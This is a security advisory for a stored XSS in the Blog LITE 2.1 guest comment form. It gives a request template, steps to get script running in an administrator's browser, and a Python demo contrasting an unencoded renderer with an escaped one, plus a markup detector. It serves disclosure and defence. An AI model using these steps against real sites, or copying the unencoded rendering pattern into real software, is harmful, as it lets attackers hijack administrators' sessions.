Blog LITE 2.1 - Stored XSS

2023.06.19
CraCkEr (LB)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Author    : CraCkEr
Website   : https://www.netartmedia.net/blog-lite
Vendor    : NetArt Media
Software  : Blog LITE 2.1
Vuln Type : Stored XSS
Impact    : Manipulate the content of the site

Release Notes:
Allows an attacker to inject malicious code into the website, giving the ability to steal sensitive information, manipulate data, and launch additional attacks.

Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Stored XSS
---------------------------------------------------------

POST /blog/index.php HTTP/2

-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="title"

[XSS Payload]
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="content"

-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="author"

[XSS Payload]
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="email"

-----------------------------401019026540470155022776857270

## Steps to Reproduce:

1. Visit any category on the blog
2. Write a comment (as Guest)
3. Inject your [XSS Payload] in "Comment Title"
4. Inject your [XSS Payload] in "Your Name"
5. Submit
6. By default the blog holds your comment for admin review
7. The admin checks [BLOG POSTS] in the Administration Panel at this path (https://website/blog/admin/index.php?page=posts)
8. When the admin checks the comments at this path (https://website/blog/admin/index.php?page=comments&id=2)
9. The XSS fires and executes in the admin's browser

[-] Done

© CraCkEr 2023
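The advisory's root cause is that the guest comment's "title" and "author" fields are written back into the admin's comment page without output encoding. The following is an added illustration written for this page; it is not Blog LITE's code (which is PHP) and makes no claim about how NetArt Media's templates are structured. It renders one constructed guest comment two ways, the unencoded way that reproduces the bug class and the encoded way that neutralises it, and adds a small triage helper a moderator-side check could run over pending comments. The sample comment, the field names beyond those in the advisory's request, and the helper names are all assumptions.

```python
import html
import re

# Constructed sample: a guest comment shaped like the advisory's multipart
# request (title, content, author, email). The markup in "title" and
# "author" is a harmless placeholder, not a payload from the advisory.
SAMPLE_COMMENT = {
    "id": 2,
    "title": "<script>alert(1)</script>",
    "author": 'guest"><script>alert(1)</script>',
    "email": "guest@example.com",
    "content": "Nice post",
}


def render_row_vulnerable(comment):
    """Interpolate the stored fields verbatim into the admin table row.

    This is the pattern the advisory describes: whatever the guest typed
    lands in the admin's page as live HTML.
    """
    return (
        f'<tr><td>{comment["title"]}</td>'
        f'<td>{comment["author"]}</td>'
        f'<td>{comment["content"]}</td></tr>'
    )


def esc(value):
    # Context-appropriate encoding for HTML text and attribute values:
    # < > & " ' are all converted to entities.
    return html.escape(str(value), quote=True)


def render_row_hardened(comment):
    """Same row, but every stored field is HTML-encoded on output."""
    return (
        f'<tr><td>{esc(comment["title"])}</td>'
        f'<td>{esc(comment["author"])}</td>'
        f'<td>{esc(comment["content"])}</td></tr>'
    )


# Crude detector for tag-like markup in a plain-text field; good enough to
# flag comments for closer review, not a substitute for output encoding.
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z!]")


def flag_markup(comment, fields=("title", "author", "email", "content")):
    """Return the names of fields that contain HTML-like markup."""
    return [f for f in fields if TAG_RE.search(str(comment.get(f, "")))]


def contains_raw_tag(rendered_html, tag="script"):
    """True if an unencoded <tag ...> survives into the rendered page."""
    return f"<{tag}" in rendered_html.lower()


if __name__ == "__main__":
    print("vulnerable:", render_row_vulnerable(SAMPLE_COMMENT))
    print("hardened:  ", render_row_hardened(SAMPLE_COMMENT))
    print("fields with markup:", flag_markup(SAMPLE_COMMENT))
```

The hardened renderer keeps the stored data untouched and encodes only at output time, which is the fix that generalises: storing "cleaned" input does not protect other pages that read the same record. The triage helper is a defender's aid for reviewing the moderation queue (step 6 of the advisory) before an admin opens it.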


Copyright 2024, cxsecurity.com